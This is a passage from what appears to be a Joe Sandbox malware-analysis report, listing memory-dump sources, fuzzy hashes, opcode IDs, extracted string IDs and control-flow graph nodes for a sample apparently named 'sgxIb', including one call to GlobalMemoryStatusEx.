                                                                                                            • Opcode Fuzzy Hash: da57bf2f26ef94a64ab8bbbc13ea2c89e7e7ef43131b66e40599a70d34997d16
                                                                                                            • Instruction Fuzzy Hash: DC130A31D10B198ACB15EF68C8946ADF7B1FF99300F15D79AE458B7221EB70AAC4CB41

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $
                                                                                                            • API String ID: 0-3993045852
                                                                                                            • Opcode ID: c022c21ec7e9116bb875dad2115bd82701ba625d8314f68a49eb31081459c344
                                                                                                            • Instruction ID: 92663d493f03d08c39ee061c7278c446881475572097dce67f81aada692880d9
                                                                                                            • Opcode Fuzzy Hash: c022c21ec7e9116bb875dad2115bd82701ba625d8314f68a49eb31081459c344
                                                                                                            • Instruction Fuzzy Hash: CA22EF71E002058FDF64DBA4C4946AEBBF2EF85320F218469D94AEB354DA35DD42CB92
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8851cf1ed1a93478b9477d8386bce96c671cda6929ca28f66f50365561bf3f1c
                                                                                                            • Instruction ID: fc1709cdb83631b68eaf885eaafa7caa7cdd16401b5ddf23296c39cd7f28aae8
                                                                                                            • Opcode Fuzzy Hash: 8851cf1ed1a93478b9477d8386bce96c671cda6929ca28f66f50365561bf3f1c
                                                                                                            • Instruction Fuzzy Hash: 1B62AF34B002048FDB54DB68D594AADB7F2FF85314F558469E90AEB360EB35ED82CB81

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: XM$XM$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2488550430
                                                                                                            • Opcode ID: dc057f56aa6dfcf7f2d0f901718b6e13a410e3a7b3a942c23fda1405424735d5
                                                                                                            • Instruction ID: 47ed01013398d02467588a92e2d98cb9cabf233c4320653bef7d296985de720c
                                                                                                            • Opcode Fuzzy Hash: dc057f56aa6dfcf7f2d0f901718b6e13a410e3a7b3a942c23fda1405424735d5
                                                                                                            • Instruction Fuzzy Hash: D0E18E30E102198FCB68DF68D4946AEB7F2FF89305F118529E909EB354DB709C868B91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: b97777b032b4bd25a8009df1307be14599f3062b7838da79d206bde59f366a71
                                                                                                            • Instruction ID: 5368c3d1740a4130b39b5b61a81abc135defbbdec09ebdd3b92fe797921a48ab
                                                                                                            • Opcode Fuzzy Hash: b97777b032b4bd25a8009df1307be14599f3062b7838da79d206bde59f366a71
                                                                                                            • Instruction Fuzzy Hash: AF914E30B1021ADFDF54EB65D8507AEB3F6AFC9204F108569D90EEB344EA709D468B91

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q
                                                                                                            • API String ID: 0-831282457
                                                                                                            • Opcode ID: 522950c536d6cd91d7fbe73c7c6d9f250d876b246448ed06462f1c6f77c689e9
                                                                                                            • Instruction ID: f34603c02f71e65427c3540bc796aed09a9c3dcbeac3186aa7279622949dded2
                                                                                                            • Opcode Fuzzy Hash: 522950c536d6cd91d7fbe73c7c6d9f250d876b246448ed06462f1c6f77c689e9
                                                                                                            • Instruction Fuzzy Hash: 9F625D30A003158FCB55EB68D580A5EB7F2FF84305B218A69D809DF759EB71ED86CB84

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4144663887.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6f30000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (bq$(bq$(bq
                                                                                                            • API String ID: 0-2716923250
                                                                                                            • Opcode ID: fca4d22cf7ef09ea5138c9481557c07ffd52a119832a74475b1dfac0e290e7d7
                                                                                                            • Instruction ID: ec46795233583d0dec06e7b5d06844d0340a31e1c7bbfdb4b1418083f08d1898
                                                                                                            • Opcode Fuzzy Hash: fca4d22cf7ef09ea5138c9481557c07ffd52a119832a74475b1dfac0e290e7d7
                                                                                                            • Instruction Fuzzy Hash: 08D1AE70E003198FCB54DFA9C8546AEBBF2FF89310F148569E405AB391DB34AE41CBA1

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq$\Ocq
                                                                                                            • API String ID: 0-3575482020
                                                                                                            • Opcode ID: d9a64970680c7b74f0d3a253e04a322d50ab8ee0e483e6aec4cedd36ca7de4a8
                                                                                                            • Instruction ID: d4c672f1eb5cda7617eb33b5ecee23e2a6d79e8016af4bc7279f577bb8059d94
                                                                                                            • Opcode Fuzzy Hash: d9a64970680c7b74f0d3a253e04a322d50ab8ee0e483e6aec4cedd36ca7de4a8
                                                                                                            • Instruction Fuzzy Hash: A1616031E002089FDB549FB9C8547AEBBF6FB88710F208429E50AEB391DF758D458B91

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: 69333ab6133bc0d042c94a61b32a04de19d36ac441ec5db2ec99cdf60eb97846
                                                                                                            • Instruction ID: fdf497160ca4ab8fbb7aa8fcd4d1263f145e4de4925ecb2d511832fcf35a7884
                                                                                                            • Opcode Fuzzy Hash: 69333ab6133bc0d042c94a61b32a04de19d36ac441ec5db2ec99cdf60eb97846
                                                                                                            • Instruction Fuzzy Hash: 7B512030B10215DFDF54EB68D9907AE73F6ABC9244F108569D90AEB398EA30DC42CB95

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq
                                                                                                            • API String ID: 0-936005338
                                                                                                            • Opcode ID: 7214d46225b926e98705ff1831b8c38ae12f6524da9d5c7a6cecd0296c836d36
                                                                                                            • Instruction ID: 7fb138776a1a543b6ca76241481266973487852797dd3972a57d70e85156ec1c
                                                                                                            • Opcode Fuzzy Hash: 7214d46225b926e98705ff1831b8c38ae12f6524da9d5c7a6cecd0296c836d36
                                                                                                            • Instruction Fuzzy Hash: 76518071B002089FDB059FB9C8547AEBBF6EF88700F208429E505EB395DA758D418B91

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 2425 feed70-feed8b 2426 feed8d-feedb4 2425->2426 2427 feedb5-feedcb 2425->2427 2449 feedcd call feee58 2427->2449 2450 feedcd call feed70 2427->2450 2430 feedd2-feedd4 2431 feedda-feee0f 2430->2431 2432 feedd6-feedd9 2430->2432 2437 feee10-feee39 2431->2437 2440 feee3f-feee54 2437->2440 2441 feee3b-feee3e 2437->2441 2440->2437 2443 feee56-feeecc GlobalMemoryStatusEx 2440->2443 2445 feeece-feeed4 2443->2445 2446 feeed5-feeefd 2443->2446 2445->2446 2449->2430 2450->2430
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4121172085.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_fe0000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4b9a9758ee7a002a76db98fa4efdeb9b40086ecd6b665e53d78fcced421a2c1a
                                                                                                            • Instruction ID: 01b2a2e6b993470adbcc75a3033d3758f6db45c73dcad4d5f311bc941357987d
                                                                                                            • Opcode Fuzzy Hash: 4b9a9758ee7a002a76db98fa4efdeb9b40086ecd6b665e53d78fcced421a2c1a
                                                                                                            • Instruction Fuzzy Hash: DE411372D043858FCB15DFB9D8102AABFF1AF8A310F1685ABD444E7282DB749885CBD1

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 2451 feee58-feeecc GlobalMemoryStatusEx 2453 feeece-feeed4 2451->2453 2454 feeed5-feeefd 2451->2454 2453->2454
                                                                                                            APIs
                                                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 00FEEEBF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4121172085.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_fe0000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 1890195054-0
                                                                                                            • Opcode ID: 614a537183da5b225506d7037a8cbeba518d1491cd35f6ca5d9ed3c912ba4f50
                                                                                                            • Instruction ID: 3821cf47c66ace412a34907b076c28a65da83be3a56a88aaa323cd2ecc24a318
                                                                                                            • Opcode Fuzzy Hash: 614a537183da5b225506d7037a8cbeba518d1491cd35f6ca5d9ed3c912ba4f50
                                                                                                            • Instruction Fuzzy Hash: 5711F3B1C006599BCB10DF9AD444BDEFBF4EF48320F15816AD818B7241D778A944CFA5

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: 09853e7299028fb64e298ff1fc75fd569590ca46fcebff9dbcb78a773e37d33b
                                                                                                            • Instruction ID: db800a8c78bb9b39836b2c9b540cc0a68ee699dcd1d3a357575835aacc61f906
                                                                                                            • Opcode Fuzzy Hash: 09853e7299028fb64e298ff1fc75fd569590ca46fcebff9dbcb78a773e37d33b
                                                                                                            • Instruction Fuzzy Hash: 0E418170E0034ADFDB65DF65C89479EBBB2AF85300F11492ADC05EB340DBB49946CB45
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: d052b616e01dba47493c8eed0cc443a235fdaafdf3265017245a761930294876
                                                                                                            • Instruction ID: 6181a5a5a34cd271968e2f3e19f2b817d4693fd38b078c6e744603f27252248c
                                                                                                            • Opcode Fuzzy Hash: d052b616e01dba47493c8eed0cc443a235fdaafdf3265017245a761930294876
                                                                                                            • Instruction Fuzzy Hash: B0310130B102058FDB599B74C8646AEBBE2AF89310F114869D806EB391DF35CE46CBA1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4144663887.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ba326c5fb091020ea2cad4560f8443556f3ecf0d07afdb88cb1d6c0c006970bd
                                                                                                            • Instruction ID: 4edc003ed42d9c97d4068acb7191579f2ff76217ef496c79bac816b661c489b1
                                                                                                            • Opcode Fuzzy Hash: ba326c5fb091020ea2cad4560f8443556f3ecf0d07afdb88cb1d6c0c006970bd
                                                                                                            • Instruction Fuzzy Hash: 5D314D34E106059BCB59DFA4D8646AEB7F6FF89300F108529E90AEB350EF71AD46CB50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4144663887.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6f30000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 20a3c58b80df6e2914f56d2268b5adf72cc742f540d17be6096059c46362ead8
                                                                                                            • Instruction ID: bf35123c53d3a978baac0581d0e4fc2fd5ca28f1716f2774e04d490d1c4f95b7
                                                                                                            • Opcode Fuzzy Hash: 20a3c58b80df6e2914f56d2268b5adf72cc742f540d17be6096059c46362ead8
                                                                                                            • Instruction Fuzzy Hash: 68213D30B102158FCB14EB78C884B6E3BBAEB88304F204029E509D7395EF74AD42CBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 257a6d30088f622fdafea120ceda13803e5b85b0f034d382100c38bfdc227856
                                                                                                            • Instruction ID: 532e039814fdc983dc9f9d02160dfa774e6b3b54efd1550025fadec9726f92e5
                                                                                                            • Opcode Fuzzy Hash: 257a6d30088f622fdafea120ceda13803e5b85b0f034d382100c38bfdc227856
                                                                                                            • Instruction Fuzzy Hash: D621F4B2E053644FCB46DB78CC512DEBFF1AF8A204F094897C445EB252EA30C945CB92
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5e6edab947044d6883f10831a06e3d49487497890860f9b72c98b4f82b3d9a93
                                                                                                            • Instruction ID: b804a9d55b9e67cb1031a170286b6f71d3262bbd0712dcb97e469fc5a41aea27
                                                                                                            • Opcode Fuzzy Hash: 5e6edab947044d6883f10831a06e3d49487497890860f9b72c98b4f82b3d9a93
                                                                                                            • Instruction Fuzzy Hash: 72218975E002059FDB50DF69D981AAEBBF5FB48300F108026EA06E7384EB35EC41CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4e410ee11f797f9fb256a257593c75d1f24c3d8da2924e04f9e5e863f1998d5b
                                                                                                            • Instruction ID: b605096f01ef41057c4ac2d2e88b719479198f2073470f36b692a2d4833f82b9
                                                                                                            • Opcode Fuzzy Hash: 4e410ee11f797f9fb256a257593c75d1f24c3d8da2924e04f9e5e863f1998d5b
                                                                                                            • Instruction Fuzzy Hash: 2C21AC75F002159FDB50DF69D980AAEBBF5FB48300F108026EA06E7384EB35DD418B90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4144663887.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6f30000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bb7db1233b9ae69225d4f3b46674bdc5e8f0ba5225282a7719c4fb7bd8b70c83
                                                                                                            • Instruction ID: f658f0ae021fc7189fc39209257fc6bbd77861aa9744948385d4bec0fbad5c54
                                                                                                            • Opcode Fuzzy Hash: bb7db1233b9ae69225d4f3b46674bdc5e8f0ba5225282a7719c4fb7bd8b70c83
                                                                                                            • Instruction Fuzzy Hash: 803102B0D01258DFDB60CF99C959B8EBFF5AF49310F64801AE454AB241C7B49A45CFA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4144663887.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6f30000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d58547ed704e4c6a24560ec37022bea3fd6faedac4c45c0a157e259048a593ed
                                                                                                            • Instruction ID: 813d24597e6184a881825d9545e8dfa3054ab1e476a2351a39506e12d0b5e480
                                                                                                            • Opcode Fuzzy Hash: d58547ed704e4c6a24560ec37022bea3fd6faedac4c45c0a157e259048a593ed
                                                                                                            • Instruction Fuzzy Hash: 78210174B102159FCB44EB78D984B6F77EAEB88304F204028E609D7354EF75AD42C7A1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e2995e455abb5566837e8ced2e473701ebb99b4c0aa67713d7fe39994ea92fba
                                                                                                            • Instruction ID: a79865bc23095c393e69ea21ab19427534eca5cb8450b528424fb64ccb13b68e
                                                                                                            • Opcode Fuzzy Hash: e2995e455abb5566837e8ced2e473701ebb99b4c0aa67713d7fe39994ea92fba
                                                                                                            • Instruction Fuzzy Hash: 53217C71D1071D8BCF64CFA9C85069EBBF5FF95300F11492AE909EB240EBB09885CB81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4120549021.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_e2d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d8fa0b561367fb33b573c4c696ab1b23c02fc845420615cae789ac06c6d78272
                                                                                                            • Instruction ID: 8c2521355d49609929b9376b37429968f3776abb02694ce5c837713e9e9c5d12
                                                                                                            • Opcode Fuzzy Hash: d8fa0b561367fb33b573c4c696ab1b23c02fc845420615cae789ac06c6d78272
                                                                                                            • Instruction Fuzzy Hash: 3D212571608204DFCB10DF14EDC0F26BBA6FB84318F24C66DDA0A5B2A2C336D807CA61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4120549021.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_e2d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d7aa265ea9a970ea4503994fd09fec53d5ca58955b2f4fdb07d9fd1b4c30c3b2
                                                                                                            • Instruction ID: 0e10e904266cd8db2a9aabe5ff01367a793f4b39492e692d61bfbb15ab50edf3
                                                                                                            • Opcode Fuzzy Hash: d7aa265ea9a970ea4503994fd09fec53d5ca58955b2f4fdb07d9fd1b4c30c3b2
                                                                                                            • Instruction Fuzzy Hash: 25215C7150D3C09FC703CB24D994B11BF71EB46214F29C5DBD9898F2A7C23A981ACB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4120549021.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_e2d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a6308df58adb61b1c970960dec94d3a41dc53708b43b75c495c6e8f881e499a0
                                                                                                            • Instruction ID: d37187dbc18a86be184dc55e43465e642dc8437d368d896786950ce2d1abd065
                                                                                                            • Opcode Fuzzy Hash: a6308df58adb61b1c970960dec94d3a41dc53708b43b75c495c6e8f881e499a0
                                                                                                            • Instruction Fuzzy Hash: 4B2129B2508200DFDB11DF14EDC4B26BB65FB94324F34C969E9091B355C336D806CA61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4120549021.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_e2d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d02bc4d49bb1b82636f044fcf03ca1ffea640ce5aeb4d7af664cbf7a2684397e
                                                                                                            • Instruction ID: a847aceab2885fefbeb2a1ddc6b49d15096a5b8867c361a876dac97b99f680b6
                                                                                                            • Opcode Fuzzy Hash: d02bc4d49bb1b82636f044fcf03ca1ffea640ce5aeb4d7af664cbf7a2684397e
                                                                                                            • Instruction Fuzzy Hash: 662125B1608204DFCB04EF14EDC4B25BBA5FB94318F20C56DDA0A5B292C336E806CB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4144663887.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6f30000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a0813cfaac495f18e2d63113e15b6416061d9a0bfaec08ac536fa22c52849d89
                                                                                                            • Instruction ID: c31ae038a1e96fd46eeba65d1340b4690ec56a0921c48f889223cbfcd0b87122
                                                                                                            • Opcode Fuzzy Hash: a0813cfaac495f18e2d63113e15b6416061d9a0bfaec08ac536fa22c52849d89
                                                                                                            • Instruction Fuzzy Hash: A231D2B0C01218DFDB60DF99C999B9EBBF5EB48314F24801AE805B7341C7B59A45CFA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b944a0426f7983ce50b9b0bc8a8a88b9889bd164060e525270b18b014f4c0def
                                                                                                            • Instruction ID: 4bac378578b24963d20a7e0561792e60dcb142679dba75cec2d383a9f80d6d76
                                                                                                            • Opcode Fuzzy Hash: b944a0426f7983ce50b9b0bc8a8a88b9889bd164060e525270b18b014f4c0def
                                                                                                            • Instruction Fuzzy Hash: 94118E32B141299FDB589668DC146AF73FAABC8310F01453AD90AE7340EE35DC428B91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5ccfc2adecf25f913a37790abcec8ea2f7822a905ccc62732c99a8115b8390c7
                                                                                                            • Instruction ID: 2871547540264be963d4ed3456aa6015f6914764eae3e2eaad2f6f5c11b4a7d0
                                                                                                            • Opcode Fuzzy Hash: 5ccfc2adecf25f913a37790abcec8ea2f7822a905ccc62732c99a8115b8390c7
                                                                                                            • Instruction Fuzzy Hash: 3601D435B101100BDB68967DD800BAEB7DBDBC9714F14843EE50EC7355EEA5CC828391
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8c59de8ffc2a454a79c5968a73c94f7d0cb0b8086023cefbca616eb1bea75f78
                                                                                                            • Instruction ID: c20c0577d1eb051fe65414ae6f34fcb57487b348d8d5135b4062583cf2a5f453
                                                                                                            • Opcode Fuzzy Hash: 8c59de8ffc2a454a79c5968a73c94f7d0cb0b8086023cefbca616eb1bea75f78
                                                                                                            • Instruction Fuzzy Hash: 3C01D431B041501BDF61D67DB4287AE77DADB8A714F148429EA0AC7384ED51DC424786
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 390420ebbffa27a10f279b8822865c95bc677de2bf525de05e87fbba56efa42c
                                                                                                            • Instruction ID: 891dc053edf06f74b72d9375b1c2a685b7d61abf610528f4e7211668ddd104e9
                                                                                                            • Opcode Fuzzy Hash: 390420ebbffa27a10f279b8822865c95bc677de2bf525de05e87fbba56efa42c
                                                                                                            • Instruction Fuzzy Hash: E421CFB5D01219AFCB00DF9AD884ADEFBF4FB49310F10812AE918B7340D374A954CBA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4120549021.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
